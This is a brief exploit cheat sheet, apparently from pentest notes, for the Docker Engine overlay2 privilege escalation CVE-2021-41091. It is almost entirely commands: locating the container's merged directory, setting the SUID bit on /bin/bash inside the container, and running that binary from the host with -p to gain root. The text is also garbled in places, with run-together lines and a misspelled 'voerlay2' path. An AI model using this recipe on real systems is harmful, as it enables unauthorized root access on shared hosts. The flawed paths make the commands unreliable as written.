Moby Docker Engine Privilege Escalation
Directory Traversal & Arbitrary Command Execution (CVE-2021-41091 )
1. Find Docker Container Directory
findmnt
# Results e.g.
/var/lib/docker/overlay2/abcdef...xyz/mergedls -la /var/lib/docker/overlay2/abcdef...xyz/merged/2. Prepare SUID Binary in Container
chmod u+s /bin/bash3. Execute the SUID Binary in Real Host
/var/lib/docker/voerlay2/abdef...xyz/merged/bin/bash -pLast updated